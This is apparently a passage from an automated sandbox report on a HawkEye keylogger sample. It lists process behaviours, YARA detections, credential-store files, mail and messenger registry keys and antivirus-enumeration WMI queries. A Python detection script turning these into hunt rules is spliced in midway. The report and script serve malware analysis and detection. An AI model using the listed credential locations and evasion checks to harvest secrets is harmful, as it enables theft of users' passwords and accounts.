                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 22_2_0041604B GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_0040724C memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 21_2_00406278 GetVersionExA,
                  Source: C:\Users\user\Desktop\FukQGQj7cl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: InstallUtil.exe, 00000010.00000002.499681826.00000000077C0000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information:

                  Yara detected HawkEye Keylogger
                  Source: Yara match | File source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.30ab2a0.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.489551476.0000000003081000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR
                  Yara detected MailPassView
                  Source: Yara match | File source: 21.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.4089930.8.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.478476a.4.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.4089930.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.45fa72.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.45fa72.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.478476a.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 21.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000015.00000002.358708597.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 6860, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
                  Tries to steal Mail credentials (via file access)
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: ESMTPPassword
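The observations above are more useful as a hunt rule than as a list: a .NET compiler (vbc.exe) opening Chrome's Login Data and the mail-client account keys, and a copy of InstallUtil.exe in %TEMP% enumerating root\SecurityCenter2 for AntivirusProduct and FirewallProduct, are the behaviours a detection should key on, while the font reads are noise. The following is an added example (not Joe Sandbox code and not part of this report) that encodes those checks and runs them over events constructed from the report's findings. The set of processes allowed to touch browser credential stores (chrome.exe only) and the list of .NET host binaries are assumptions for the demo, labelled as such in the code.

```python
"""Behaviour-based triage of the kind of observations a sandbox report lists.

Added example (not Joe Sandbox code). The events below are CONSTRUCTED from the
findings in this report; the legitimate credential-store owners and the set of
.NET host binaries are assumptions for the demo.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    process: str   # image path of the acting process
    action: str    # "file_open" | "reg_open" | "wmi_query"
    target: str    # file path, registry key or WQL statement


# Constructed from the report's observations (paths as the report lists them),
# plus one benign Chrome event and one font read as negative controls.
SAMPLE_EVENTS = [
    Event(r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe", "file_open",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    Event(r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe", "reg_open",
          r"HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts"),
    Event(r"C:\Users\user\AppData\Local\Temp\InstallUtil.exe", "wmi_query",
          r"root\SecurityCenter2 : SELECT * FROM AntivirusProduct"),
    Event(r"C:\Users\user\AppData\Local\Temp\InstallUtil.exe", "file_open",
          r"C:\Windows\Fonts\BASKVILL.TTF"),
    Event(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "file_open",
          r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]

# Chromium credential / autofill stores the report shows being opened.
CREDENTIAL_FILES = re.compile(r"\\(Login Data|Web Data)$", re.I)

# Mail / IM account keys the report shows vbc.exe opening (suffix match, hive-agnostic).
CREDENTIAL_KEYS = (
    r"\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts",
    r"\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles",
    r"\Software\IncrediMail\Identities",
    r"\Software\Microsoft\Windows Live Mail",
    r"\Software\Google\Google Talk\Accounts",
)

# Security Center enumeration via WMI (AntivirusProduct / FirewallProduct in the report).
SECURITY_WMI = re.compile(
    r"root\\SecurityCenter2\s*:\s*SELECT\b.*\bFROM\s+(AntivirusProduct|FirewallProduct|AntiSpywareProduct)",
    re.I)

# ASSUMPTION: only the browser itself should open its own Login Data / Web Data.
CREDENTIAL_OWNERS = {"chrome.exe"}
# ASSUMPTION: .NET framework utilities used as hollowing hosts in this report
# (vbc.exe, InstallUtil.exe) plus a few commonly abused siblings.
DOTNET_HOSTS = {"vbc.exe", "installutil.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe"}
FRAMEWORK_DIR = r"c:\windows\microsoft.net\framework"   # prefix also covers Framework64


def image_name(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> list:
    """Return the detection tags a single event triggers (empty list if none)."""
    name = image_name(ev.process)
    tags = []
    if ev.action == "file_open" and CREDENTIAL_FILES.search(ev.target) \
            and name not in CREDENTIAL_OWNERS:
        tags.append("browser_credential_store_access")
    if ev.action == "reg_open" and any(
            ev.target.lower().endswith(k.lower()) for k in CREDENTIAL_KEYS):
        tags.append("mail_or_im_credential_key_access")
    if ev.action == "wmi_query" and SECURITY_WMI.search(ev.target):
        tags.append("security_product_enumeration")
    # A copy of a .NET utility running from %TEMP% instead of the framework directory.
    if name in DOTNET_HOSTS and not ev.process.lower().startswith(FRAMEWORK_DIR):
        tags.append("dotnet_utility_outside_framework_dir")
    return tags


def triage(events) -> dict:
    """Aggregate tags per process; processes with no tags are left out."""
    report = {}
    for ev in events:
        for tag in classify(ev):
            report.setdefault(ev.process, set()).add(tag)
    return report


if __name__ == "__main__":
    for proc, tags in triage(SAMPLE_EVENTS).items():
        print(proc, "->", ", ".join(sorted(tags)))
```

Run as a script it reports vbc.exe for the browser and mail credential access and the %TEMP% copy of InstallUtil.exe for the Security Center query and its off-path location; chrome.exe opening its own Login Data and the font reads produce nothing. On a real host the same logic applies to Sysmon file-create, registry and WMI events, with the owner and host lists tuned to the environment.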
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4acafa7.10.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.409c0d.3.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48c2477.7.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.472e905.5.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.4089930.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 22.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.408208.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.40a1b50.7.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac319a.11.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac319a.11.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 22.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4acafa7.10.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.40a1b50.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48ba66a.6.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 16.2.InstallUtil.exe.409c0d.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.4ac95a2.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.472e905.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.472cf00.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48ba66a.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48c0a72.8.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.FukQGQj7cl.exe.48c2477.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000010.00000002.494750181.0000000004081000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000016.00000002.364855957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.324877095.0000000004838000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.324260828.0000000004726000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000010.00000002.483743736.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: FukQGQj7cl.exe PID: 4792, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6284, type: MEMORYSTR

                  Remote Access Functionality:

                  Detected HawkEye Rat
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, String found in binary or memory: Installed Firewall: MHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
                  Source: FukQGQj7cl.exe, 00000001.00000002.325532719.0000000004AC3000.00000004.00000001.sdmp, String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
